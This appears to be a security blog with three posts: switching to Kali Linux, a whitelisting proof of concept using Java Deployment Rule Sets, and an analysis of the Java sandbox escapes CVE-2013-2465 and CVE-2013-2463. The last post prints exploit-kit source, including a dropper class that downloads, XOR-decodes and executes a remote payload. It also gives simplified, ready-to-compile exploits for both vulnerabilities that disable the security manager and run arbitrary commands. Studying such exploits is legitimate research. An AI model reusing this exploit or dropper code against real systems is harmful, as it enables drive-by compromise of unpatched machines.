Using Kali Linux as my sole OS

It’s been a while since I posted anything, I’ve been pretty busy… but I’ve recently been looking into other pentesting distros other than Kali, so thought I’d make a quick post.

It was only a couple years ago where I was primarily a windows user. At the time, I was into gaming, so windows was really the only option I had. At home, my desktop had to run Windows, not only because most game only run on Windows, but also that’s what the family is used to. If I had to travel, my laptop running Windows 7 had to be handy so I can play StarCraft 2 or World of Warcraft in the hotel – I spent a lot of time gaming.

Switching to Backtrack

In an effort to break my gaming addictions, mid-2012, I decided to make the move to Linux. Not only that, but I decided that I would only use Backtrack. Yes, I know it’s not the “safest” distro for general use, but my main goal at the time was to put all that time I would have spent gaming, towards the more practical use of learning how pentests are done – from the tools to the techniques. It was also around this time that I decided to sign up for Offensive Security’s Pentesting with Backtrack course (amazing class by the way). So, with my 64-bit Backtrack laptop (64-bit not recommended for general use or PWB, but I like challenges), I managed to have lots of fun in the lab, and learned a lot about linux, pentesting, python, and C. It was totally worth the switch.

However, Backtrack is a pain. It took me hours to install, configure, and get everything I required on top of the default install configured so everything actually worked together. I actually wrote a procedure for a clean install, as I ended up doing this so many times (primarily due to paranoia). It included such things as setting up a non-root account (easy) to installing OCLHashcat (for the underpowered nVidia GPU in my laptop, to tinker with – this was a challenge to figure out). Once complete, it made for a decent general use laptop, considering my general use is not typical.

On to Kali Linux

Now (and for a while now), Kali Linux is here. Everything installed just works together without the need for troubleshooting. Since it’s Debian based, it’s simple to customize and add in other software, and chances are you won’t break anything by doing so. The only con is that you still have to set up a non-root account, but that’s not hard to do, so there’s little reason to let that get in the way of giving it a try.

So far, every additional installations I’ve done have worked flawlessly – this list of installs include:

  • VMWare Workstation
  • Virtual Box
  • Chromium (with Flash)
  • Tor (why not)
  • LibreOffice
  • XChat IRC
  • OCLHashCat (not used on my laptop, but installed anyway)
  • Java SDK (disabled for browsing of course)
  • 0 A.D. (linux game, not amazing, but helps with the addiction)
  • and more

All of these were simple to install, especially compared to doing the same in BackTrack.

Kali is stable, familiar, and is not missing any tools I typically use (and if it is missing something, it’s easy enough to install). I really don’t have any complaints about Kali. It even has a disk encryption option during install (Backtrack didn’t), which I of course choose, and I’ve seen no performance hit by doing so.

Looking Into Other Pentesting Distros

I really just starting looking around, not because I’m unhappy with Kali, but mainly just because I’m curious. I’ve downloaded Backbox linux and Pentoo to start with… from what I’m hearing, these seem to be the next popular distros. I don’t have much to say yet, as I’ve really just started, but if I notice anything that makes me drop Kali and make a switch, I’ll be sure to say something.

Until then, I just wanted to point out that Kali Linux is great at being a general use OS. Just make sure you setup a non-root user for added security, and it should be safe enough for general use.

Java Deployment Rule Set

While the Java Deployment Rule Set has been out for a short while now, I just got around to looking into it.

I initially had some doubts that I could get it to work how I intended, but after a short few hours, I had effectively disabled all java applications, except from the ones I explicitly had in my XML whitelist.

Backing up a little bit, everyone out there is aware that many enterprises have issues with upgrading to the latest java version. There have been many proposed solutions, some which work better than others, but in my opinion, there really hasn’t been anything that mitigates the risk significantly enough for the additional cost of any given solution. For example, using two browsers, one for internal use, one for web browsing, was a proposal I’ve heard thrown around. While this may work in theory, by doing this, an enterprise would incur more costs to keep the second browser patched and maintained, and more costs to build security controls around this new browser as well (policies to disable the ability for users to use a proxy, or using the intranet browser to go on the internet, ect), not to mention any additional installed software introduces additional risk just by being there.

In any case, after initially reading various articles, such as this one, this whitelisting concept sounded interesting, so I thought I would give it a try.

Preperation

First, to set up my VM, I installed the following applications:

  1. JDK 7u40 (required)
  2. JRE 6u30 (any old version of java should work)
  3. OpenSSL for Windows (you’ll need a certificate to sign the JAR file)

After that, I mostly followed Oracle’s initial blog about Deployment Rule Sets, so some of the following is repeated, but I tried to give more detail, as some part’s were unclear in their blog if you just quickly wanted to throw together a POC.

Generate and Install Certificate

First, as you’ll need to sign the final JAR file, with OpenSSL installed, I ran the following commands to generate a PKCS12 file, answering the various questions as necessary:

cd C:\OpenSSL-Win64\bin


set OPENSSL_CONF=C:\OpenSSL-Win64\bin\openssl.cfg


openssl.exe req -x509 -nodes -days 365 -newkey rsa:2048 -keyout privateKey.key -out certificate.crt


openssl.exe pkcs12 -export -inkey privateKey.key -in certificate.crt -name jaxin -out server.p12

After everything was generated, I copied the various generated files to my desktop just to make things easy.

Next, I imported this certificate into Java by opening the Java Control Panel, going to the Security tab, and clicking on Manage Certificates.
Java Deployment Rule Set Import Cert1

From there, select the Signer CA drop down, and import the certificate you just generated.
Java Deployment Rule Set Import Cert2

Create and Install the RuleSet

Just for a simple test, I used the following ruleset and saved it to a file called ruleset.xml on my Desktop:

<ruleset version="1.0+">
  <rule>
    <id location="javatester.org" />
    <action permission="run" version="1.6.0_30" />
  </rule>
  <rule>
    <id />
    <action permission="block">
      <message>Blocked by corporate</message>
    </action>
  </rule>
</ruleset>

In the real-world, you would have a rule for every white-listed internal application at your enterprise, but I just wanted to test this new functionality out. The first rule should allow Java applets in the javatester.org domain to run fine, under version Java6u30. The second rule is a catch-all, and should block all other Java applets you browse to.

Now, in the command window, I ran the following:

jar -cvf DeploymentRuleSet.jar ruleset.xml


keytool -import -file certificate.crt -alias jaxin -keystore jaxin.jks


jarsigner -verbose -keystore server.p12 -storepass NA -storetype pkcs12 DeploymentRuleSet.jar jaxin

I then created the directory C:\Windows\Sun\Java\Deployment and copied the signed DeploymentRuleSet.jar file there.

Testing the RuleSet

Finally, the results :)

I navigated to http://javatester.org/version.html, and I was presented with the following (Note: I enabled the Java Console to always display, just to see what happens)
Java Deployment Rule Set Result1

First, the Java 7 update 40 console appeared (left console appeared first), and appears to have checked the ‘whitelist’, and ran the applet under Java 6 update 30 (right console appeared second), just as the ruleset specified. The version the applet detected was in fact Java 6u30, which is what we were going for, as our “legacy” java software would break under the newer java versions :)

And, if we go anywhere else, whether it be intranet or internet, we are presented with the following:
Java Deployment Rule Set Result2

So everything appears to work as intended.

Conclusion

While this was just a quick POC, it was enough to show this actually has some promise as a solution to mitigate the risk an enterprise incurs by using legacy java applications.

There are some cons to this approach:

  • If not protected, the end user may be able to delete the DeploymentRuleSet.jar and bypass these restrictions. This mostly would affect corporations that allow their users to run as a local administrator, and so there’s less control over what the user does on their PC
  • There would be some overhead of managing this DeploymentRuleSet.jar file, storing the certificates, ect.
  • This is a new feature in Java, so there may be some bugs/vulnerabilities introduced (perhaps the white-list can be bypassed? I don’t know, I haven’t looked into how this feature works quite yet)

Still, I am thinking the benefits gained outweigh all the potential cons. Instead of flat out blocking java for the default rule, you can set the version to SECURE-1.7, which in theory will force users to have the latest/secure version of Java 1.7 installed in order to run all other Java applets they come across. While all versions of Java appear to be vulnerable to something, much of the risk of being infected would be mitigated by running the latest version of Java while browsing the internet.

So in conclusion, this (currently) appears to be a great risk-mitigation solution for enterprises who can’t (or don’t want to) remove or patch Java. I just hope that this white-list isn’t as easy to bypass as the JVM sandbox has been :D

A Java 6 killer – CVE-2013-2465 (update, now with CVE-2013-2463)

Now after my 30 day lab time at OffSec’s CTP course is up (awesome, more on that later), onto CVE-2013-2465, which can exploit all of Java 6, including the latest (6u45), as well as Java 7u21 and below and Java 5u45 and below. As noted elsewhere, this exploit, among many others, is significant as Java6u45 will not be patched by Oracle, so anyone not upgrading to Java 7 (ie the latest out there) will be easily exploited… not that Java 7 is much better, but at least it’s being patched… on occasion…

A nice source to take a look at these exploits can be found here (and great blog overall): http://malware.dontneedcoffee.com/2013/08/cve-2013-2465-integrating-exploit-kits.html. They also seem to have CVE-2013-2463, which there seems to be a buzz about, so will probably take a look at that later:

 

UPDATE: I decided I didn’t need sleep, took a look at the Neutrino CVE-2013-2463 acquired from dontneedcoffee.com as well as CVE-2013-2465. They are nearly the same, so figured might as well include both here :)

Anyway, I wanted to see how this exploit worked and put together some working code, so I downloaded Neutrino’s take on the exploit, and analyzed it (‘deobfuscating’ manually of course… I use that term loosely this time).

Starting with CVE-2013-2465:

alt(simplified)alt(original)drpijkikjjikjkikji
Alt.java

import java.applet.Applet;
import java.awt.geom.AffineTransform;
import java.awt.image.AffineTransformOp;
import java.awt.image.BufferedImage;
import java.awt.image.DataBufferByte;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

public class Alt extends Applet
{
  private static final String space = "[0-9]";
  private boolean _is64 = System.getProperty("os.arch", "").contains("64");

  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (ism()); i++)
        attempt();
      if (ism())
        System.exit(0);
      String str = getParameter("exec");
      byte[] arrayOfByte = getParameter("xkey").getBytes("ISO_8859_1");
      drp.dx(str, arrayOfByte);
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  public static boolean ism()
  {
    return jki.gg() != null;
  }

  private int attempt()
  {
    try
    {
      Class localClass = ijk.scs();
      String str = "setSecurityManager";
      Object[] arrayOfObject1 = new Object[1];
      Object localObject = ikj.stt(localClass, str, arrayOfObject1);
      DataBufferByte localDataBufferByte = new DataBufferByte(16);
      int[] arrayOfInt = new int[8];
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = ikj.stt(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { 
            new ProtectionDomain(new CodeSource(null, new Certificate[0]), 
            localPermissions) });
      arrayOfObject2[4] = jik.sgt(arrayOfObject2[2]);
      int i = arrayOfInt.length;
      BufferedImage localBufferedImage1 = new BufferedImage(4, 1, 2);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel = 
            new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 44 + 
            (this._is64 ? 8 : 0));
      WritableRaster localWritableRaster = 
            Raster.createWritableRaster(localMultiPixelPackedSampleModel, 
            localDataBufferByte, null);
      BufferedImage localBufferedImage2 = new BufferedImage(new jki(), 
            localWritableRaster, false, null);
      localBufferedImage1.getRaster().setPixel(0, 0, 
            new int[] { -1, -1, -1, -1 });
      AffineTransformOp localAffineTransformOp = new AffineTransformOp(
            new AffineTransform(1.0F, 0.0F, 0.0F, 1.0F, 0.0F, 0.0F), null);
      localAffineTransformOp.filter(localBufferedImage1, localBufferedImage2);
      int j = arrayOfInt.length;
      if (j == i)
        return 1;
      int k = 0;
      int m = arrayOfObject2.length;
      for (int n = i + 2; n < i + 32; n++)
        if ((arrayOfInt[(n - 1)] == m) && (arrayOfInt[n] == 0) && 
            (arrayOfInt[(n + 1)] == 0) && 
            (arrayOfInt[(n + 2)] != 0) && (arrayOfInt[(n + 3)] != 0) && 
            (arrayOfInt[(n + 4)] != 0) && 
            (arrayOfInt[(n + 5)] == 0) && (arrayOfInt[(n + 6)] == 0))
        {
          int i1 = arrayOfInt[(n + 4)];
          for (int i2 = n + 7; i2 < n + 7 + 64; i2++)
            if (arrayOfInt[i2] == i1)
            {
              arrayOfInt[(i2 - 1)] = arrayOfInt[(n + 3)];
              k = 1;
              break;
            }
          if (k != 0)
            break;
        }
      if (k != 0)
        try
        {
          kji.ste(arrayOfObject2[2]);
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
    }
    return 0;
  }

  private byte[] pic(String paramString)
  {
    int i = paramString.length();
    byte[] arrayOfByte = new byte[i];
    for (int j = 0; j < i; j++);
    return arrayOfByte;
  }

  private String unpic(byte[] paramArrayOfByte)
  {
    StringBuilder localStringBuilder = new StringBuilder("");
    for (int i = 0; i < paramArrayOfByte.length; i++)
      localStringBuilder.append('A');
    return localStringBuilder.toString();
  }
}
Alt.java

import java.applet.Applet;
import java.awt.geom.AffineTransform;
import java.awt.image.AffineTransformOp;
import java.awt.image.BufferedImage;
import java.awt.image.DataBufferByte;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

public class Alt extends Applet
{
  private static final String space = "[0-9]";
  private boolean _is64 = System.getProperty("os.arch", "").contains("23658960895608958238905234850894369806320987698476264".substring(51));

  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (ism()); i++)
        attempt();
      if (ism())
        System.exit(0);
      String str = getParameter("7383568568e464564568465656x568458456845684568e6546845685684568c45845684878467864757584".replaceAll("[0-9]", ""));
      byte[] arrayOfByte = getParameter("357868538x456845685368363865754767638967895738565437568568k65835683568335683456836e5658356856865856356y65548548685454".replaceAll("[0-9]", "")).getBytes("ISO_8859_1");
      drp.dx(str, arrayOfByte);
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  public static boolean ism()
  {
    return jki.gg() != null;
  }

  private int attempt()
  {
    try
    {
      Class localClass = ijk.scs();
      String str = "5787296778996057409608997181782001s38e45005225928t79487S9124417301e27388412740c6808u26779r304867i957349t193364y67997M1510a86087n53122a574023961g057026331060e06143687r9043645745487".replaceAll("[0-9]", "");
      Object[] arrayOfObject1 = new Object[1];
      Object localObject = ikj.stt(localClass, str, arrayOfObject1);
      DataBufferByte localDataBufferByte = new DataBufferByte(16);
      int[] arrayOfInt = new int[8];
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = ikj.stt(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { new ProtectionDomain(new CodeSource(null, new Certificate[0]), localPermissions) });
      arrayOfObject2[4] = jik.sgt(arrayOfObject2[2]);
      int i = arrayOfInt.length;
      BufferedImage localBufferedImage1 = new BufferedImage(4, 1, 2);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel = new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 44 + (this._is64 ? 8 : 0));
      WritableRaster localWritableRaster = Raster.createWritableRaster(localMultiPixelPackedSampleModel, localDataBufferByte, null);
      BufferedImage localBufferedImage2 = new BufferedImage(new jki(), localWritableRaster, false, null);
      localBufferedImage1.getRaster().setPixel(0, 0, new int[] { -1, -1, -1, -1 });
      AffineTransformOp localAffineTransformOp = new AffineTransformOp(new AffineTransform(1.0F, 0.0F, 0.0F, 1.0F, 0.0F, 0.0F), null);
      localAffineTransformOp.filter(localBufferedImage1, localBufferedImage2);
      int j = arrayOfInt.length;
      if (j == i)
        return 1;
      int k = 0;
      int m = arrayOfObject2.length;
      for (int n = i + 2; n < i + 32; n++)
        if ((arrayOfInt[(n - 1)] == m) && (arrayOfInt[n] == 0) && (arrayOfInt[(n + 1)] == 0) && (arrayOfInt[(n + 2)] != 0) && (arrayOfInt[(n + 3)] != 0) && (arrayOfInt[(n + 4)] != 0) && (arrayOfInt[(n + 5)] == 0) && (arrayOfInt[(n + 6)] == 0))
        {
          int i1 = arrayOfInt[(n + 4)];
          for (int i2 = n + 7; i2 < n + 7 + 64; i2++)
            if (arrayOfInt[i2] == i1)
            {
              arrayOfInt[(i2 - 1)] = arrayOfInt[(n + 3)];
              k = 1;
              break;
            }
          if (k != 0)
            break;
        }
      if (k != 0)
        try
        {
          kji.ste(arrayOfObject2[2]);
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
    }
    return 0;
  }

  private byte[] pic(String paramString)
  {
    int i = paramString.length();
    byte[] arrayOfByte = new byte[i];
    for (int j = 0; j < i; j++);
    return arrayOfByte;
  }

  private String unpic(byte[] paramArrayOfByte)
  {
    StringBuilder localStringBuilder = new StringBuilder("");
    for (int i = 0; i < paramArrayOfByte.length; i++)
      localStringBuilder.append('A');
    return localStringBuilder.toString();
  }
}
drp.java

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.UnsupportedEncodingException;
import java.net.URL;
import java.nio.ByteBuffer;
import java.nio.channels.Channels;
import java.nio.channels.ReadableByteChannel;
import javax.xml.bind.DatatypeConverter;

class drp
{
  private static String db64(String paramString)
    throws UnsupportedEncodingException
  {
    byte[] arrayOfByte = DatatypeConverter.parseBase64Binary(paramString);
    return new String(arrayOfByte, "UTF-8");
  }

  public static void dx(String paramString, byte[] paramArrayOfByte)
    throws IOException
  {
    if (paramString.isEmpty())
      System.exit(0);
    if (!paramString.startsWith("http"))
      paramString = db64(paramString);
    if (!paramString.startsWith("http"))
      System.exit(0);
    ReadableByteChannel localReadableByteChannel = null;
    try
    {
      localReadableByteChannel = 
        Channels.newChannel(new URL(paramString).openStream());
    }
    catch (IOException localIOException)
    {
      System.exit(0);
    }
    for (ByteBuffer localByteBuffer = ByteBuffer.allocate(4096); 
        localReadableByteChannel.read(localByteBuffer) != -1; 
        localByteBuffer = rsb(localByteBuffer));
    byte[] arrayOfByte = new byte[localByteBuffer.position()];
    localByteBuffer.position(0);
    localByteBuffer.get(arrayOfByte);
    File localFile = File.createTempFile("~tmf", null);
    FileOutputStream localFileOutputStream = new FileOutputStream(localFile);
    int i = paramArrayOfByte.length;
    for (int j = 0; j < arrayOfByte.length; j++)
      arrayOfByte[j] = ((byte)(arrayOfByte[j] ^ paramArrayOfByte[(j % i)]));
    localFileOutputStream.write(arrayOfByte);
    localFileOutputStream.flush();
    localFileOutputStream.close();
    Runtime.getRuntime().exec(new String[] { localFile.getAbsolutePath() });
    System.exit(0);
  }

  private static ByteBuffer rsb(ByteBuffer paramByteBuffer)
  {
    ByteBuffer localByteBuffer = paramByteBuffer;
    if (paramByteBuffer.remaining() < 4096)
    {
      localByteBuffer = ByteBuffer.allocate(paramByteBuffer.capacity() * 2);
      paramByteBuffer.flip();
      localByteBuffer.put(paramByteBuffer);
    }
    return localByteBuffer;
  }
}
ijk.java

import java.awt.color.ICC_ColorSpace;
import java.awt.color.ICC_Profile;

public class ijk extends ICC_ColorSpace
{
  public ijk()
  {
    super(ICC_Profile.getInstance(1000));
  }

  public int getNumComponents()
  {
    int i = 1;
    return i;
  }

  public static Class scs()
  {
    return System.class;
  }
}
ikj.java

import java.beans.Statement;

public class ikj
{
  public static Object stt(Object paramObject, String paramString, 
    Object[] paramArrayOfObject)
    throws Exception
  {
    return new Statement(paramObject, paramString, paramArrayOfObject);
  }
}
jik.java

import java.beans.Statement;

public class jik
{
  public static Object sgt(Object paramObject)
  {
    return ((Statement)paramObject).getTarget();
  }
}
jki.java

import java.awt.image.ComponentColorModel;
import java.awt.image.Raster;

public class jki extends ComponentColorModel
{
  public jki()
  {
    super(new ijk(), new int[] { 8, 8, 8 }, false, false, 1, 0);
  }

  public boolean isCompatibleRaster(Raster paramRaster)
  {
    boolean bool = true;
    return bool;
  }

  public static SecurityManager gg()
  {
    return System.getSecurityManager();
  }
}
kji.java

import java.beans.Statement;

public class kji
{
  public static void ste(Object paramObject)
  {
    try
    {
      ((Statement)paramObject).execute();
    }
    catch (Exception localException)
    {
    }
  }
}

After some review, honestly, the exploit has very little obfuscation. Really, Alt.java is the most notable file, as it contains the actual exploit (the “attempt” function). The only other two files that are necessary are ijk.java (it extends ICC_ColorSpace) and jki (extends ComponentColorModel).

This is the reduced files (which as always, will pop up calc.exe upon exploit).

Note: Remember to only use this on machines you’re authorized to exploit, anything else is illegal!

appletMainmyColorModelmyColorSpace
Alt.java

import java.applet.Applet;
import java.awt.geom.AffineTransform;
import java.awt.image.AffineTransformOp;
import java.awt.image.BufferedImage;
import java.awt.image.DataBufferByte;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.beans.Statement;

public class Alt extends Applet
{
  private boolean _is64 = System.getProperty("os.arch", "").contains("64");

  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (isSecManNotNull()); i++)
      {
        attempt();
      }
      if (isSecManNotNull())
      {
         System.exit(0);
      }
      Runtime.getRuntime().exec(new String[] { "calc.exe" });
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  public static boolean isSecManNotNull()
  {
    return System.getSecurityManager() != null;
  }

  private int attempt()
  {
    try
    {
      Class localClass = getSystemClass();
      String str = "setSecurityManager";
      Object[] arrayOfObject1 = new Object[1];
      Object localObject = new Statement(localClass, str, arrayOfObject1);
      DataBufferByte localDataBufferByte = new DataBufferByte(16);
      int[] arrayOfInt = new int[8];
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = new Statement(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { 
            new ProtectionDomain(new CodeSource(null, new Certificate[0]), 
            localPermissions) });
      arrayOfObject2[4] = ((Statement)arrayOfObject2[2]).getTarget();
      int i = arrayOfInt.length;
      BufferedImage localBufferedImage1 = new BufferedImage(4, 1, 2);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel = 
            new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 44 + 
            (this._is64 ? 8 : 0));
      WritableRaster localWritableRaster = 
            Raster.createWritableRaster(localMultiPixelPackedSampleModel, 
            localDataBufferByte, null);
      BufferedImage localBufferedImage2 = new BufferedImage(
            new myColorModel(), localWritableRaster, false, null);
      localBufferedImage1.getRaster().setPixel(0, 0, 
            new int[] { -1, -1, -1, -1 });
      AffineTransformOp localAffineTransformOp = 
            new AffineTransformOp(new AffineTransform(1.0F, 0.0F, 
            0.0F, 1.0F, 0.0F, 0.0F), null);
      localAffineTransformOp.filter(localBufferedImage1, localBufferedImage2);
      int j = arrayOfInt.length;
      if (j == i)
        return 1;
      int k = 0;
      int m = arrayOfObject2.length;
      for (int n = i + 2; n < i + 32; n++)
        if ((arrayOfInt[(n - 1)] == m) 
            && (arrayOfInt[n] == 0) 
            && (arrayOfInt[(n + 1)] == 0) 
            && (arrayOfInt[(n + 2)] != 0) 
            && (arrayOfInt[(n + 3)] != 0) 
            && (arrayOfInt[(n + 4)] != 0) 
            && (arrayOfInt[(n + 5)] == 0) 
            && (arrayOfInt[(n + 6)] == 0))
        {
          int i1 = arrayOfInt[(n + 4)];
          for (int i2 = n + 7; i2 < n + 7 + 64; i2++)
            if (arrayOfInt[i2] == i1)
            {
              arrayOfInt[(i2 - 1)] = arrayOfInt[(n + 3)];
              k = 1;
              break;
            }
          if (k != 0)
            break;
        }
      if (k != 0)
        try
        {
          ((Statement)arrayOfObject2[2]).execute();
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
    }
    return 0;
  }

  private byte[] pic(String paramString)
  {
    int i = paramString.length();
    byte[] arrayOfByte = new byte[i];
    for (int j = 0; j < i; j++);
    return arrayOfByte;
  }

  private String unpic(byte[] paramArrayOfByte)
  {
    StringBuilder localStringBuilder = new StringBuilder("");
    for (int i = 0; i < paramArrayOfByte.length; i++)
      localStringBuilder.append('A');
    return localStringBuilder.toString();
  }

  public static Class getSystemClass()
  {
    return System.class;
  }
}
Alt.java

import java.awt.image.ComponentColorModel;
import java.awt.image.Raster;

public class myColorModel extends ComponentColorModel
{
  public myColorModel()
  {
    super(new myColorSpace(), new int[] { 8, 8, 8 }, false, false, 1, 0);
  }

  public boolean isCompatibleRaster(Raster paramRaster)
  {
    boolean bool = true;
    return bool;
  }
}
Alt.java

import java.awt.color.ICC_ColorSpace;
import java.awt.color.ICC_Profile;

public class myColorSpace extends ICC_ColorSpace
{
  public myColorSpace()
  {
    super(ICC_Profile.getInstance(1000));
  }

  public int getNumComponents()
  {
    int i = 1;
    return i;
  }
}

And, the result against Java6u45 (no click to run apparently necessary):
cve-2013-2465-success

The CVE description says this is related to “Incorrect image channel verification”.

The key seems to be where the AccessControlContext class is essentially passed a Permissions object containing AllPermission(). From what I gather, AffineTransformOp has a call to a vulnerable storeImageArray() method, which seems to have something like a buffer overflow vulnerability, where once outside of that buffer, you are working outside of the sandbox (or something like that, Java isn’t my specialty). Then you use the AllPermissions Permission to work without a Security Manager.

Update:
Now, taking a look at CVE-2013-2463, the code is just about the same, it just exploits AlphaComposite.Src.createContext instead of AffineTransformOp. But the end code is very similar (the key different areas are bolded). Also, only a single class is used for this exploit.

appletMain
Alt.java

import java.applet.Applet;
import java.awt.AlphaComposite;
import java.awt.CompositeContext;
import java.awt.image.DataBufferByte;
import java.awt.image.IndexColorModel;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.beans.Statement;

public class Alt2 extends Applet
{

  private boolean _is64 = System.getProperty("os.arch", "").contains("64");

  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (isSecManNotNull()); i++)
      {
        attempt();
      }
      if (isSecManNotNull())
      {
         System.exit(0);
      }
      Runtime.getRuntime().exec(new String[] { "calc.exe" });
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  public static boolean isSecManNotNull()
  {
    return System.getSecurityManager() != null;
  }

  private int attempt()
  {
    try
    {
      Class localClass = getSystemClass();
      String str = "setSecurityManager";
      Object[] arrayOfObject1 = new Object[1];
      Object localObject = new Statement(localClass, str, arrayOfObject1);
      DataBufferByte localDataBufferByte1 = new DataBufferByte(9);
      int[] arrayOfInt = new int[8];
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = new Statement(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { 
            new ProtectionDomain(new CodeSource(null, new Certificate[0]), 
            localPermissions) });
      arrayOfObject2[4] = ((Statement)arrayOfObject2[2]).getTarget();
      int i = arrayOfInt.length;
      DataBufferByte localDataBufferByte2 = new DataBufferByte(8);
      for (int j = 0; j < 8; j++)
        localDataBufferByte2.setElem(j, -1);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel1 = 
            new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 0);
      WritableRaster localWritableRaster1 = Raster.createWritableRaster(
            localMultiPixelPackedSampleModel1, localDataBufferByte2, null);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel2 = 
            new MultiPixelPackedSampleModel(0, 4, 2, 1, 
            1073741789 - (this._is64 ? 16 : 0), 288 + (this._is64 ? 128 : 0));
      WritableRaster localWritableRaster2 = Raster.createWritableRaster(
            localMultiPixelPackedSampleModel2, localDataBufferByte1, null);
      byte[] arrayOfByte = { 0, -1 };
      IndexColorModel localIndexColorModel = new IndexColorModel(1, 2, 
            arrayOfByte, arrayOfByte, arrayOfByte);
      CompositeContext localCompositeContext = 
            AlphaComposite.Src.createContext(
            localIndexColorModel, localIndexColorModel, null);
      localCompositeContext.compose(localWritableRaster1, 
            localWritableRaster2, localWritableRaster2);
      int k = arrayOfInt.length;
      if (k == i)
        return 1;
      int m = 0;
      int n = arrayOfObject2.length;
      for (int i1 = i + 2; i1 < i + 32; i1++)
        if ((arrayOfInt[(i1 - 1)] == n) 
            && (arrayOfInt[i1] == 0) 
            && (arrayOfInt[(i1 + 1)] == 0) 
            && (arrayOfInt[(i1 + 2)] != 0) 
            && (arrayOfInt[(i1 + 3)] != 0) 
            && (arrayOfInt[(i1 + 4)] != 0) 
            && (arrayOfInt[(i1 + 5)] == 0) 
            && (arrayOfInt[(i1 + 6)] == 0))
        {
          int i2 = arrayOfInt[(i1 + 4)];
          for (int i3 = i1 + 7; i3 < i1 + 7 + 64; i3++)
            if (arrayOfInt[i3] == i2)
            {
              arrayOfInt[(i3 - 1)] = arrayOfInt[(i1 + 3)];
              m = 1;
              break;
            }
          if (m != 0)
            break;
        }
      if (m != 0)
        try
        {
          ((Statement)arrayOfObject2[2]).execute();
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
    }
    return 0;
  }

  public static Class getSystemClass()
  {
    return System.class;
  }
}

The behavior of CVE-2013-2463 appears to be the same as CVE-2013-2465. Neither trigger a click-to-run Java warning, they both just run, exploit, and pop up calc.exe with no problems.

In any case, some fairly simple source code for this exploits are above, and no special byte code alterations needed like last time, just compile and go.

As always, again:

Note: Remember to only use this on machines you’re authorized to exploit, anything else is illegal!

And if you run Java… just uninstall or at least patch…